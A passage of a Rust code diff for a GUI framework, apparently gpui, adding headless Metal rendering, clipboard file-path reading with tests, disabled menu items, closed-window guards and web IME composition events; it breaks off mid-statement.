+ pub fn render_scene_to_image(
+ &mut self,
+ scene: &Scene,
+ size: Size<DevicePixels>,
+ ) -> Result<RgbaImage> {
+ if size.width.0 <= 0 || size.height.0 <= 0 {
+ anyhow::bail!("Invalid size for render_scene_to_image: {:?}", size);
+ }
+
+ // Update path intermediate textures for this size
+ self.update_path_intermediate_textures(size);
+
+ // Create an offscreen texture as render target
+ let texture_descriptor = metal::TextureDescriptor::new();
+ texture_descriptor.set_width(size.width.0 as u64);
+ texture_descriptor.set_height(size.height.0 as u64);
+ texture_descriptor.set_pixel_format(MTLPixelFormat::BGRA8Unorm);
+ texture_descriptor
+ .set_usage(metal::MTLTextureUsage::RenderTarget | metal::MTLTextureUsage::ShaderRead);
+ texture_descriptor.set_storage_mode(metal::MTLStorageMode::Managed);
+ let target_texture = self.device.new_texture(&texture_descriptor);
+
+ loop {
+ let mut instance_buffer = self
+ .instance_buffer_pool
+ .lock()
+ .acquire(&self.device, self.is_unified_memory);
+
+ let command_buffer =
+ self.draw_primitives_to_texture(scene, &mut instance_buffer, &target_texture, size);
+
+ match command_buffer {
+ Ok(command_buffer) => {
+ let instance_buffer_pool = self.instance_buffer_pool.clone();
+ let instance_buffer = Cell::new(Some(instance_buffer));
+ let block = ConcreteBlock::new(move |_| {
+ if let Some(instance_buffer) = instance_buffer.take() {
+ instance_buffer_pool.lock().release(instance_buffer);
+ }
+ });
+ let block = block.copy();
+ command_buffer.add_completed_handler(&block);
+
+ // On discrete GPUs (non-unified memory), Managed textures
+ // require an explicit blit synchronize before the CPU can
+ // read back the rendered data. Without this, get_bytes
+ // returns stale zeros.
+ if !self.is_unified_memory {
+ let blit = command_buffer.new_blit_command_encoder();
+ blit.synchronize_resource(&target_texture);
+ blit.end_encoding();
+ }
+
+ // Commit and wait for completion
+ command_buffer.commit();
+ command_buffer.wait_until_completed();
+
+ // Read pixels from the texture
+ let width = size.width.0 as u32;
+ let height = size.height.0 as u32;
+ let bytes_per_row = width as usize * 4;
+ let buffer_size = height as usize * bytes_per_row;
+
+ let mut pixels = vec![0u8; buffer_size];
+
+ let region = metal::MTLRegion {
+ origin: metal::MTLOrigin { x: 0, y: 0, z: 0 },
+ size: metal::MTLSize {
+ width: width as u64,
+ height: height as u64,
+ depth: 1,
+ },
+ };
+
+ target_texture.get_bytes(
+ pixels.as_mut_ptr() as *mut std::ffi::c_void,
+ bytes_per_row as u64,
+ region,
+ 0,
+ );
+
+ // Convert BGRA to RGBA (swap B and R channels)
+ for chunk in pixels.chunks_exact_mut(4) {
+ chunk.swap(0, 2);
+ }
+
+ return RgbaImage::from_raw(width, height, pixels).ok_or_else(|| {
+ anyhow::anyhow!("Failed to create RgbaImage from pixel data")
+ });
+ }
+ Err(err) => {
+ log::error!(
+ "failed to render: {}. retrying with larger instance buffer size",
+ err
+ );
+ let mut instance_buffer_pool = self.instance_buffer_pool.lock();
+ let buffer_size = instance_buffer_pool.buffer_size;
+ if buffer_size >= 256 * 1024 * 1024 {
+ anyhow::bail!("instance buffer size grew too large: {}", buffer_size);
+ }
+ instance_buffer_pool.reset(buffer_size * 2);
+ log::info!(
+ "increased instance buffer size to {}",
+ instance_buffer_pool.buffer_size
+ );
+ }
+ }
+ }
+ }
+
fn draw_primitives(
&mut self,
scene: &Scene,
instance_buffer: &mut InstanceBuffer,
drawable: &metal::MetalDrawableRef,
viewport_size: Size<DevicePixels>,
+ ) -> Result<metal::CommandBuffer> {
+ self.draw_primitives_to_texture(scene, instance_buffer, drawable.texture(), viewport_size)
+ }
+
+ fn draw_primitives_to_texture(
+ &mut self,
+ scene: &Scene,
+ instance_buffer: &mut InstanceBuffer,
+ texture: &metal::TextureRef,
+ viewport_size: Size<DevicePixels>,
) -> Result<metal::CommandBuffer> {
let command_queue = self.command_queue.clone();
let command_buffer = command_queue.new_command_buffer();
- let alpha = if self.layer.is_opaque() { 1. } else { 0. };
+ let alpha = if self.opaque { 1. } else { 0. };
let mut instance_offset = 0;
- let mut command_encoder = new_command_encoder(
+ let mut command_encoder = new_command_encoder_for_texture(
command_buffer,
- drawable,
+ texture,
viewport_size,
|color_attachment| {
color_attachment.set_load_action(metal::MTLLoadAction::Clear);
@@ -617,9 +789,9 @@ impl MetalRenderer {
command_buffer,
);
- command_encoder = new_command_encoder(
+ command_encoder = new_command_encoder_for_texture(
command_buffer,
- drawable,
+ texture,
viewport_size,
|color_attachment| {
color_attachment.set_load_action(metal::MTLLoadAction::Load);
@@ -1309,9 +1481,9 @@ impl MetalRenderer {
}
}
-fn new_command_encoder<'a>(
+fn new_command_encoder_for_texture<'a>(
command_buffer: &'a metal::CommandBufferRef,
- drawable: &'a metal::MetalDrawableRef,
+ texture: &'a metal::TextureRef,
viewport_size: Size<DevicePixels>,
configure_color_attachment: impl Fn(&RenderPassColorAttachmentDescriptorRef),
) -> &'a metal::RenderCommandEncoderRef {
@@ -1320,7 +1492,7 @@ fn new_command_encoder<'a>(
.color_attachments()
.object_at(0)
.unwrap();
- color_attachment.set_texture(Some(drawable.texture()));
+ color_attachment.set_texture(Some(texture));
color_attachment.set_store_action(metal::MTLStoreAction::Store);
configure_color_attachment(color_attachment);
@@ -1506,3 +1678,32 @@ pub struct SurfaceBounds {
pub bounds: Bounds<ScaledPixels>,
pub content_mask: ContentMask<ScaledPixels>,
}
+
+#[cfg(any(test, feature = "test-support"))]
+pub struct MetalHeadlessRenderer {
+ renderer: MetalRenderer,
+}
+
+#[cfg(any(test, feature = "test-support"))]
+impl MetalHeadlessRenderer {
+ pub fn new() -> Self {
+ let instance_buffer_pool = Arc::new(Mutex::new(InstanceBufferPool::default()));
+ let renderer = MetalRenderer::new_headless(instance_buffer_pool);
+ Self { renderer }
+ }
+}
+
+#[cfg(any(test, feature = "test-support"))]
+impl gpui::PlatformHeadlessRenderer for MetalHeadlessRenderer {
+ fn render_scene_to_image(
+ &mut self,
+ scene: &Scene,
+ size: Size<DevicePixels>,
+ ) -> anyhow::Result<image::RgbaImage> {
+ self.renderer.render_scene_to_image(scene, size)
+ }
+
+ fn sprite_atlas(&self) -> Arc<dyn gpui::PlatformAtlas> {
+ self.renderer.sprite_atlas().clone()
+ }
+}
@@ -1,16 +1,23 @@
use core::slice;
-use std::ffi::c_void;
+use std::ffi::{CStr, c_void};
+use std::path::PathBuf;
use cocoa::{
- appkit::{NSPasteboard, NSPasteboardTypePNG, NSPasteboardTypeString, NSPasteboardTypeTIFF},
+ appkit::{
+ NSFilenamesPboardType, NSPasteboard, NSPasteboardTypePNG, NSPasteboardTypeString,
+ NSPasteboardTypeTIFF,
+ },
base::{id, nil},
- foundation::NSData,
+ foundation::{NSArray, NSData, NSFastEnumeration, NSString},
};
use objc::{msg_send, runtime::Object, sel, sel_impl};
+use smallvec::SmallVec;
use strum::IntoEnumIterator as _;
use crate::ns_string;
-use gpui::{ClipboardEntry, ClipboardItem, ClipboardString, Image, ImageFormat, hash};
+use gpui::{
+ ClipboardEntry, ClipboardItem, ClipboardString, ExternalPaths, Image, ImageFormat, hash,
+};
pub struct Pasteboard {
inner: id,
@@ -41,28 +48,37 @@ impl Pasteboard {
}
pub fn read(&self) -> Option<ClipboardItem> {
- // First, see if it's a string.
unsafe {
- let pasteboard_types: id = self.inner.types();
- let string_type: id = ns_string("public.utf8-plain-text");
+ // Check for file paths first
+ let filenames = NSPasteboard::propertyListForType(self.inner, NSFilenamesPboardType);
+ if filenames != nil && NSArray::count(filenames) > 0 {
+ let mut paths = SmallVec::new();
+ for file in filenames.iter() {
+ let f = NSString::UTF8String(file);
+ let path = CStr::from_ptr(f).to_string_lossy().into_owned();
+ paths.push(PathBuf::from(path));
+ }
+ if !paths.is_empty() {
+ let mut entries = vec![ClipboardEntry::ExternalPaths(ExternalPaths(paths))];
+
+ // Also include the string representation so text editors can
+ // paste the path as text.
+ if let Some(string_item) = self.read_string_from_pasteboard() {
+ entries.push(string_item);
+ }
- if msg_send![pasteboard_types, containsObject: string_type] {
- let data = self.inner.dataForType(string_type);
- if data == nil {
- return None;
- } else if data.bytes().is_null() {
- // https://developer.apple.com/documentation/foundation/nsdata/1410616-bytes?language=objc
- // "If the length of the NSData object is 0, this property returns nil."
- return Some(self.read_string(&[]));
- } else {
- let bytes =
- slice::from_raw_parts(data.bytes() as *mut u8, data.length() as usize);
-
- return Some(self.read_string(bytes));
+ return Some(ClipboardItem { entries });
}
}
- // If it wasn't a string, try the various supported image types.
+ // Next, check for a plain string.
+ if let Some(string_entry) = self.read_string_from_pasteboard() {
+ return Some(ClipboardItem {
+ entries: vec![string_entry],
+ });
+ }
+
+ // Finally, try the various supported image types.
for format in ImageFormat::iter() {
if let Some(item) = self.read_image(format) {
return Some(item);
@@ -70,7 +86,6 @@ impl Pasteboard {
}
}
- // If it wasn't a string or a supported image type, give up.
None
}
@@ -94,8 +109,26 @@ impl Pasteboard {
}
}
- fn read_string(&self, text_bytes: &[u8]) -> ClipboardItem {
+ unsafe fn read_string_from_pasteboard(&self) -> Option<ClipboardEntry> {
unsafe {
+ let pasteboard_types: id = self.inner.types();
+ let string_type: id = ns_string("public.utf8-plain-text");
+
+ if !msg_send![pasteboard_types, containsObject: string_type] {
+ return None;
+ }
+
+ let data = self.inner.dataForType(string_type);
+ let text_bytes: &[u8] = if data == nil {
+ return None;
+ } else if data.bytes().is_null() {
+ // https://developer.apple.com/documentation/foundation/nsdata/1410616-bytes?language=objc
+ // "If the length of the NSData object is 0, this property returns nil."
+ &[]
+ } else {
+ slice::from_raw_parts(data.bytes() as *mut u8, data.length() as usize)
+ };
+
let text = String::from_utf8_lossy(text_bytes).to_string();
let metadata = self
.data_for_type(self.text_hash_type)
@@ -111,9 +144,7 @@ impl Pasteboard {
}
});
- ClipboardItem {
- entries: vec![ClipboardEntry::String(ClipboardString { text, metadata })],
- }
+ Some(ClipboardEntry::String(ClipboardString { text, metadata }))
}
}
@@ -300,12 +331,44 @@ impl UTType {
#[cfg(test)]
mod tests {
- use cocoa::{appkit::NSPasteboardTypeString, foundation::NSData};
+ use cocoa::{
+ appkit::{NSFilenamesPboardType, NSPasteboard, NSPasteboardTypeString},
+ base::{id, nil},
+ foundation::{NSArray, NSData},
+ };
+ use std::ffi::c_void;
- use gpui::{ClipboardEntry, ClipboardItem, ClipboardString};
+ use gpui::{ClipboardEntry, ClipboardItem, ClipboardString, ImageFormat};
use super::*;
+ unsafe fn simulate_external_file_copy(pasteboard: &Pasteboard, paths: &[&str]) {
+ unsafe {
+ let ns_paths: Vec<id> = paths.iter().map(|p| ns_string(p)).collect();
+ let ns_array = NSArray::arrayWithObjects(nil, &ns_paths);
+
+ let mut types = vec![NSFilenamesPboardType];
+ types.push(NSPasteboardTypeString);
+
+ let types_array = NSArray::arrayWithObjects(nil, &types);
+ pasteboard.inner.declareTypes_owner(types_array, nil);
+
+ pasteboard
+ .inner
+ .setPropertyList_forType(ns_array, NSFilenamesPboardType);
+
+ let joined = paths.join("\n");
+ let bytes = NSData::dataWithBytes_length_(
+ nil,
+ joined.as_ptr() as *const c_void,
+ joined.len() as u64,
+ );
+ pasteboard
+ .inner
+ .setData_forType(bytes, NSPasteboardTypeString);
+ }
+ }
+
#[test]
fn test_string() {
let pasteboard = Pasteboard::unique();
@@ -339,4 +402,124 @@ mod tests {
Some(ClipboardItem::new_string(text_from_other_app.to_string()))
);
}
+
+ #[test]
+ fn test_read_external_path() {
+ let pasteboard = Pasteboard::unique();
+
+ unsafe {
+ simulate_external_file_copy(&pasteboard, &["/test.txt"]);
+ }
+
+ let item = pasteboard.read().expect("should read clipboard item");
+
+ // Test both ExternalPaths and String entries exist
+ assert_eq!(item.entries.len(), 2);
+
+ // Test first entry is ExternalPaths
+ match &item.entries[0] {
+ ClipboardEntry::ExternalPaths(ep) => {
+ assert_eq!(ep.paths(), &[PathBuf::from("/test.txt")]);
+ }
+ other => panic!("expected ExternalPaths, got {:?}", other),
+ }
+
+ // Test second entry is String
+ match &item.entries[1] {
+ ClipboardEntry::String(s) => {
+ assert_eq!(s.text(), "/test.txt");
+ }
+ other => panic!("expected String, got {:?}", other),
+ }
+ }
+
+ #[test]
+ fn test_read_external_paths_with_spaces() {
+ let pasteboard = Pasteboard::unique();
+ let paths = ["/some file with spaces.txt"];
+
+ unsafe {
+ simulate_external_file_copy(&pasteboard, &paths);
+ }
+
+ let item = pasteboard.read().expect("should read clipboard item");
+
+ match &item.entries[0] {
+ ClipboardEntry::ExternalPaths(ep) => {
+ assert_eq!(ep.paths(), &[PathBuf::from("/some file with spaces.txt")]);
+ }
+ other => panic!("expected ExternalPaths, got {:?}", other),
+ }
+ }
+
+ #[test]
+ fn test_read_multiple_external_paths() {
+ let pasteboard = Pasteboard::unique();
+ let paths = ["/file.txt", "/image.png"];
+
+ unsafe {
+ simulate_external_file_copy(&pasteboard, &paths);
+ }
+
+ let item = pasteboard.read().expect("should read clipboard item");
+ assert_eq!(item.entries.len(), 2);
+
+ // Test both ExternalPaths and String entries exist
+ match &item.entries[0] {
+ ClipboardEntry::ExternalPaths(ep) => {
+ assert_eq!(
+ ep.paths(),
+ &[PathBuf::from("/file.txt"), PathBuf::from("/image.png"),]
+ );
+ }
+ other => panic!("expected ExternalPaths, got {:?}", other),
+ }
+
+ match &item.entries[1] {
+ ClipboardEntry::String(s) => {
+ assert_eq!(s.text(), "/file.txt\n/image.png");
+ assert_eq!(s.metadata, None);
+ }
+ other => panic!("expected String, got {:?}", other),
+ }
+ }
+
+ #[test]
+ fn test_read_image() {
+ let pasteboard = Pasteboard::unique();
+
+ // Smallest valid PNG: 1x1 transparent pixel
+ let png_bytes: &[u8] = &[
+ 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A, 0x00, 0x00, 0x00, 0x0D, 0x49, 0x48,
+ 0x44, 0x52, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x08, 0x06, 0x00, 0x00,
+ 0x00, 0x1F, 0x15, 0xC4, 0x89, 0x00, 0x00, 0x00, 0x0A, 0x49, 0x44, 0x41, 0x54, 0x78,
+ 0x9C, 0x62, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0xE5, 0x27, 0xDE, 0xFC, 0x00, 0x00,
+ 0x00, 0x00, 0x49, 0x45, 0x4E, 0x44, 0xAE, 0x42, 0x60, 0x82,
+ ];
+
+ unsafe {
+ let ns_png_type = NSPasteboardTypePNG;
+ let types_array = NSArray::arrayWithObjects(nil, &[ns_png_type]);
+ pasteboard.inner.declareTypes_owner(types_array, nil);
+
+ let data = NSData::dataWithBytes_length_(
+ nil,
+ png_bytes.as_ptr() as *const c_void,
+ png_bytes.len() as u64,
+ );
+ pasteboard.inner.setData_forType(data, ns_png_type);
+ }
+
+ let item = pasteboard.read().expect("should read PNG image");
+
+ // Test Image entry exists
+ assert_eq!(item.entries.len(), 1);
+ match &item.entries[0] {
+ ClipboardEntry::Image(img) => {
+ assert_eq!(img.format, ImageFormat::Png);
+ assert_eq!(img.bytes, png_bytes);
+ }
+ other => panic!("expected Image, got {:?}", other),
+ }
+ }
}
@@ -7,8 +7,8 @@ use block::ConcreteBlock;
use cocoa::{
appkit::{
NSApplication, NSApplicationActivationPolicy::NSApplicationActivationPolicyRegular,
- NSEventModifierFlags, NSMenu, NSMenuItem, NSModalResponse, NSOpenPanel, NSSavePanel,
- NSVisualEffectState, NSVisualEffectView, NSWindow,
+ NSControl as _, NSEventModifierFlags, NSMenu, NSMenuItem, NSModalResponse, NSOpenPanel,
+ NSSavePanel, NSVisualEffectState, NSVisualEffectView, NSWindow,
},
base::{BOOL, NO, YES, id, nil, selector},
foundation::{
@@ -297,6 +297,7 @@ impl MacPlatform {
action,
os_action,
checked,
+ disabled,
} => {
// Note that this is intentionally using earlier bindings, whereas typically
// later ones take display precedence. See the discussion on
@@ -394,13 +395,18 @@ impl MacPlatform {
if *checked {
item.setState_(NSVisualEffectState::Active);
}
+ item.setEnabled_(if *disabled { NO } else { YES });
let tag = actions.len() as NSInteger;
let _: () = msg_send![item, setTag: tag];
actions.push(action.boxed_clone());
item
}
- MenuItem::Submenu(Menu { name, items }) => {
+ MenuItem::Submenu(Menu {
+ name,
+ items,
+ disabled,
+ }) => {
let item = NSMenuItem::new(nil).autorelease();
let submenu = NSMenu::new(nil).autorelease();
submenu.setDelegate_(delegate);
@@ -408,6 +414,7 @@ impl MacPlatform {
submenu.addItem_(Self::create_menu_item(item, delegate, actions, keymap));
}
item.setSubmenu_(submenu);
+ item.setEnabled_(if *disabled { NO } else { YES });
item.setTitle_(ns_string(name));
item
}
@@ -53,7 +53,8 @@ use crate::open_type::apply_features_and_fallbacks;
#[allow(non_upper_case_globals)]
const kCGImageAlphaOnly: u32 = 7;
-pub(crate) struct MacTextSystem(RwLock<MacTextSystemState>);
+/// macOS text system using CoreText for font shaping.
+pub struct MacTextSystem(RwLock<MacTextSystemState>);
#[derive(Clone, PartialEq, Eq, Hash)]
struct FontKey {
@@ -73,7 +74,8 @@ struct MacTextSystemState {
}
impl MacTextSystem {
- pub(crate) fn new() -> Self {
+ /// Create a new MacTextSystem.
+ pub fn new() -> Self {
Self(RwLock::new(MacTextSystemState {
memory_source: MemSource::empty(),
system_source: SystemSource::new(),
@@ -359,13 +361,22 @@ impl MacTextSystemState {
fn raster_bounds(&self, params: &RenderGlyphParams) -> Result<Bounds<DevicePixels>> {
let font = &self.fonts[params.font_id.0];
let scale = Transform2F::from_scale(params.scale_factor);
- Ok(bounds_from_rect_i(font.raster_bounds(
+ let mut bounds: Bounds<DevicePixels> = bounds_from_rect_i(font.raster_bounds(
params.glyph_id.0,
params.font_size.into(),
scale,
HintingOptions::None,
font_kit::canvas::RasterizationOptions::GrayscaleAa,
- )?))
+ )?);
+
+ // Add 3% of font size as padding, clamped between 1 and 5 pixels
+ // to avoid clipping of anti-aliased edges.
+ let pad =
+ ((params.font_size.as_f32() * 0.03 * params.scale_factor).ceil() as i32).clamp(1, 5);
+ bounds.origin.x -= DevicePixels(pad);
+ bounds.size.width += DevicePixels(pad);
+
+ Ok(bounds)
}
fn rasterize_glyph(
@@ -55,7 +55,10 @@ use std::{
path::PathBuf,
ptr::{self, NonNull},
rc::Rc,
- sync::{Arc, Weak},
+ sync::{
+ Arc, Weak,
+ atomic::{AtomicBool, Ordering},
+ },
time::Duration,
};
use util::ResultExt;
@@ -172,6 +175,10 @@ unsafe fn build_classes() {
sel!(mouseExited:),
handle_view_event as extern "C" fn(&Object, Sel, id),
);
+ decl.add_method(
+ sel!(magnifyWithEvent:),
+ handle_view_event as extern "C" fn(&Object, Sel, id),
+ );
decl.add_method(
sel!(mouseDragged:),
handle_view_event as extern "C" fn(&Object, Sel, id),
@@ -436,6 +443,7 @@ struct MacWindowState {
select_previous_tab_callback: Option<Box<dyn FnMut()>>,
toggle_tab_bar_callback: Option<Box<dyn FnMut()>>,
activated_least_once: bool,
+ closed: Arc<AtomicBool>,
// The parent window if this window is a sheet (Dialog kind)
sheet_parent: Option<id>,
}
@@ -760,6 +768,7 @@ impl MacWindow {
select_previous_tab_callback: None,
toggle_tab_bar_callback: None,
activated_least_once: false,
+ closed: Arc::new(AtomicBool::new(false)),
sheet_parent: None,
})));
@@ -1016,6 +1025,17 @@ impl Drop for MacWindow {
}
}
+/// Calls `f` if the window is not closed.
+///
+/// This should be used when spawning foreground tasks that interact with the
+/// window, as some messages will end up hard faulting if dispatched to
+/// no-longer-valid window handles.
+fn if_window_not_closed(closed: Arc<AtomicBool>, f: impl FnOnce()) {
+ if !closed.load(Ordering::Acquire) {
+ f();
+ }
+}
+
impl PlatformWindow for MacWindow {
fn bounds(&self) -> Bounds<Pixels> {
self.0.as_ref().lock().bounds()
@@ -1036,14 +1056,15 @@ impl PlatformWindow for MacWindow {
fn resize(&mut self, size: Size<Pixels>) {
let this = self.0.lock();
let window = this.native_window;
+ let closed = this.closed.clone();
this.foreground_executor
.spawn(async move {
- unsafe {
+ if_window_not_closed(closed, || unsafe {
window.setContentSize_(NSSize {
width: size.width.as_f32() as f64,
height: size.height.as_f32() as f64,
});
- }
+ })
})
.detach();
}
@@ -1256,15 +1277,21 @@ impl PlatformWindow for MacWindow {
}
});
let block = block.copy();
- let native_window = self.0.lock().native_window;
- let executor = self.0.lock().foreground_executor.clone();
+ let lock = self.0.lock();
+ let native_window = lock.native_window;
+ let closed = lock.closed.clone();
+ let executor = lock.foreground_executor.clone();
executor
.spawn(async move {
- let _: () = msg_send![
- alert,
- beginSheetModalForWindow: native_window
- completionHandler: block
- ];
+ if !closed.load(Ordering::Acquire) {
+ let _: () = msg_send![
+ alert,
+ beginSheetModalForWindow: native_window
+ completionHandler: block
+ ];
+ } else {
+ let _: () = msg_send![alert, release];
+ }
})
.detach();
@@ -1273,12 +1300,16 @@ impl PlatformWindow for MacWindow {
}
fn activate(&self) {
- let window = self.0.lock().native_window;
- let executor = self.0.lock().foreground_executor.clone();
+ let lock = self.0.lock();
+ let window = lock.native_window;
+ let closed = lock.closed.clone();
+ let executor = lock.foreground_executor.clone();
executor
.spawn(async move {
- unsafe {
- let _: () = msg_send![window, makeKeyAndOrderFront: nil];
+ if !closed.load(Ordering::Acquire) {
+ unsafe {
+ let _: () = msg_send![window, makeKeyAndOrderFront: nil];
+ }
}
})
.detach();
@@ -1416,11 +1447,12 @@ impl PlatformWindow for MacWindow {
fn zoom(&self) {
let this = self.0.lock();
let window = this.native_window;
+ let closed = this.closed.clone();
this.foreground_executor
.spawn(async move {
- unsafe {
+ if_window_not_closed(closed, || unsafe {
window.zoom_(nil);
- }
+ })
})
.detach();
}
@@ -1428,11 +1460,12 @@ impl PlatformWindow for MacWindow {
fn toggle_fullscreen(&self) {
let this = self.0.lock();
let window = this.native_window;
+ let closed = this.closed.clone();
this.foreground_executor
.spawn(async move {
- unsafe {
+ if_window_not_closed(closed, || unsafe {
window.toggleFullScreen_(nil);
- }
+ })
})
.detach();
}
@@ -1573,45 +1606,48 @@ impl PlatformWindow for MacWindow {
fn titlebar_double_click(&self) {
let this = self.0.lock();
let window = this.native_window;
+ let closed = this.closed.clone();
this.foreground_executor
.spawn(async move {
- unsafe {
- let defaults: id = NSUserDefaults::standardUserDefaults();
- let domain = ns_string("NSGlobalDomain");
- let key = ns_string("AppleActionOnDoubleClick");
-
- let dict: id = msg_send![defaults, persistentDomainForName: domain];
- let action: id = if !dict.is_null() {
- msg_send![dict, objectForKey: key]
- } else {
- nil
- };
+ if_window_not_closed(closed, || {
+ unsafe {
+ let defaults: id = NSUserDefaults::standardUserDefaults();
+ let domain = ns_string("NSGlobalDomain");
+ let key = ns_string("AppleActionOnDoubleClick");
+
+ let dict: id = msg_send![defaults, persistentDomainForName: domain];
+ let action: id = if !dict.is_null() {
+ msg_send![dict, objectForKey: key]
+ } else {
+ nil
+ };
- let action_str = if !action.is_null() {
- CStr::from_ptr(NSString::UTF8String(action)).to_string_lossy()
- } else {
- "".into()
- };
+ let action_str = if !action.is_null() {
+ CStr::from_ptr(NSString::UTF8String(action)).to_string_lossy()
+ } else {
+ "".into()
+ };
- match action_str.as_ref() {
- "None" => {
- // "Do Nothing" selected, so do no action
- }
- "Minimize" => {
- window.miniaturize_(nil);
- }
- "Maximize" => {
- window.zoom_(nil);
- }
- "Fill" => {
- // There is no documented API for "Fill" action, so we'll just zoom the window
- window.zoom_(nil);
- }
- _ => {
- window.zoom_(nil);
+ match action_str.as_ref() {
+ "None" => {
+ // "Do Nothing" selected, so do no action
+ }
+ "Minimize" => {
+ window.miniaturize_(nil);
+ }
+ "Maximize" => {
+ window.zoom_(nil);
+ }
+ "Fill" => {
+ // There is no documented API for "Fill" action, so we'll just zoom the window
+ window.zoom_(nil);
+ }
+ _ => {
+ window.zoom_(nil);
+ }
}
}
- }
+ })
})
.detach();
}
@@ -1795,10 +1831,13 @@ extern "C" fn handle_key_event(this: &Object, native_event: id, key_equivalent:
// may need them even if there is no marked text;
// however we skip keys with control or the input handler adds control-characters to the buffer.
// and keys with function, as the input handler swallows them.
+ // and keys with platform (Cmd), so that Cmd+key events (e.g. Cmd+`) are not
+ // consumed by the IME on non-QWERTY / dead-key layouts.
if is_composing
|| (key_down_event.keystroke.key_char.is_none()
&& !key_down_event.keystroke.modifiers.control
- && !key_down_event.keystroke.modifiers.function)
+ && !key_down_event.keystroke.modifiers.function
+ && !key_down_event.keystroke.modifiers.platform)
{
{
let mut lock = window_state.as_ref().lock();
@@ -2063,11 +2102,13 @@ fn update_window_scale_factor(window_state: &Arc<Mutex<MacWindowState>>) {
let scale_factor = lock.scale_factor();
let size = lock.content_size();
let drawable_size = size.to_device_pixels(scale_factor);
- unsafe {
- let _: () = msg_send![
- lock.renderer.layer(),
- setContentsScale: scale_factor as f64
- ];
+ if let Some(layer) = lock.renderer.layer() {
+ unsafe {
+ let _: () = msg_send![
+ layer,
+ setContentsScale: scale_factor as f64
+ ];
+ }
}
lock.renderer.update_drawable_size(drawable_size);
@@ -2104,10 +2145,12 @@ extern "C" fn window_did_change_key_status(this: &Object, selector: Sel, _: id)
// in theory, we're not supposed to invoke this method manually but it balances out
// the spurious `becomeKeyWindow` event and helps us work around that bug.
if selector == sel!(windowDidBecomeKey:) && !is_active {
+ let native_window = lock.native_window;
+ drop(lock);
unsafe {
- let _: () = msg_send![lock.native_window, resignKeyWindow];
- return;
+ let _: () = msg_send![native_window, resignKeyWindow];
}
+ return;
}
let executor = lock.foreground_executor.clone();
@@ -2174,6 +2217,7 @@ extern "C" fn close_window(this: &Object, _: Sel) {
let close_callback = {
let window_state = get_window_state(this);
let mut lock = window_state.as_ref().lock();
+ lock.closed.store(true, Ordering::Release);
lock.close_callback.take()
};
@@ -28,6 +28,7 @@ gpui_macos.workspace = true
[target.'cfg(target_os = "windows")'.dependencies]
gpui_windows.workspace = true
+gpui = { workspace = true, features = ["windows-manifest"] }
[target.'cfg(any(target_os = "linux", target_os = "freebsd"))'.dependencies]
gpui_linux.workspace = true
@@ -59,6 +59,22 @@ pub fn current_platform(headless: bool) -> Rc<dyn Platform> {
}
}
+/// Returns a new [`HeadlessRenderer`] for the current platform, if available.
+#[cfg(feature = "test-support")]
+pub fn current_headless_renderer() -> Option<Box<dyn gpui::PlatformHeadlessRenderer>> {
+ #[cfg(target_os = "macos")]
+ {
+ Some(Box::new(
+ gpui_macos::metal_renderer::MetalHeadlessRenderer::new(),
+ ))
+ }
+
+ #[cfg(not(target_os = "macos"))]
+ {
+ None
+ }
+}
+
#[cfg(all(test, target_os = "macos"))]
mod tests {
use super::*;
@@ -35,6 +35,7 @@ raw-window-handle = "0.6"
wasm_thread = { version = "0.3", features = ["es_modules"], optional = true }
web-sys = { version = "0.3", features = [
"console",
+ "CompositionEvent",
"CssStyleDeclaration",
"DataTransfer",
"Document",
@@ -1,10 +1,10 @@
use std::rc::Rc;
use gpui::{
- Capslock, ExternalPaths, FileDropEvent, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers,
- ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent, MouseMoveEvent,
- MouseUpEvent, NavigationDirection, Pixels, PlatformInput, Point, ScrollDelta, ScrollWheelEvent,
- TouchPhase, point, px,
+ Capslock, DispatchEventResult, ExternalPaths, FileDropEvent, KeyDownEvent, KeyUpEvent,
+ Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent,
+ MouseMoveEvent, MouseUpEvent, NavigationDirection, Pixels, PlatformInput, Point, ScrollDelta,
+ ScrollWheelEvent, TouchPhase, point, px,
};
use smallvec::smallvec;
use wasm_bindgen::prelude::*;
@@ -64,6 +64,9 @@ impl WebWindowInner {
self.register_dragleave(),
self.register_key_down(),
self.register_key_up(),
+ self.register_composition_start(),
+ self.register_composition_update(),
+ self.register_composition_end(),
self.register_focus(),
self.register_blur(),
self.register_pointer_enter(),
@@ -87,6 +90,18 @@ impl WebWindowInner {
closure
}
+ fn listen_input(
+ self: &Rc<Self>,
+ event_name: &str,
+ handler: impl FnMut(JsValue) + 'static,
+ ) -> Closure<dyn FnMut(JsValue)> {
+ let closure = Closure::<dyn FnMut(JsValue)>::new(handler);
+ self.input_element
+ .add_event_listener_with_callback(event_name, closure.as_ref().unchecked_ref())
+ .ok();
+ closure
+ }
+
/// Registers a listener with `{passive: false}` so that `preventDefault()` works.
/// Needed for events like `wheel` which are passive by default in modern browsers.
fn listen_non_passive(
@@ -109,11 +124,9 @@ impl WebWindowInner {
closure
}
- fn dispatch_input(&self, input: PlatformInput) {
+ fn dispatch_input(&self, input: PlatformInput) -> Option<DispatchEventResult> {
let mut borrowed = self.callbacks.borrow_mut();
- if let Some(ref mut callback) = borrowed.input {
- callback(input);
- }
+ borrowed.input.as_mut().map(|callback| callback(input))
}
fn register_pointer_down(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
@@ -121,7 +134,7 @@ impl WebWindowInner {
self.listen("pointerdown", move |event: JsValue| {
let event: web_sys::PointerEvent = event.unchecked_into();
event.prevent_default();
- this.canvas.focus().ok();
+ this.input_element.focus().ok();
let button = dom_mouse_button_to_gpui(event.button());
let position = pointer_position_in_element(&event);
@@ -315,7 +328,7 @@ impl WebWindowInner {
fn register_key_down(self: &Rc<Self>) -> Closure<dyn FnMut(JsValue)> {
let this = Rc::clone(self);
- self.listen("keydown", move |event: JsValue| {
+ self.listen_input("keydown", move |event: JsValue| {
let event: web_sys::KeyboardEvent = event.unchecked_into();
let modifiers = modifiers_from_keyboard_event(&event, this.is_mac);
@@ -346,20 +359,38 @@ impl WebWindowInner {
let keystroke = Keystroke {
modifiers,
key,
- key_char,
+ key_char: key_char.clone(),
};
- this.dispatch_input(PlatformInput::KeyDown(KeyDownEvent {
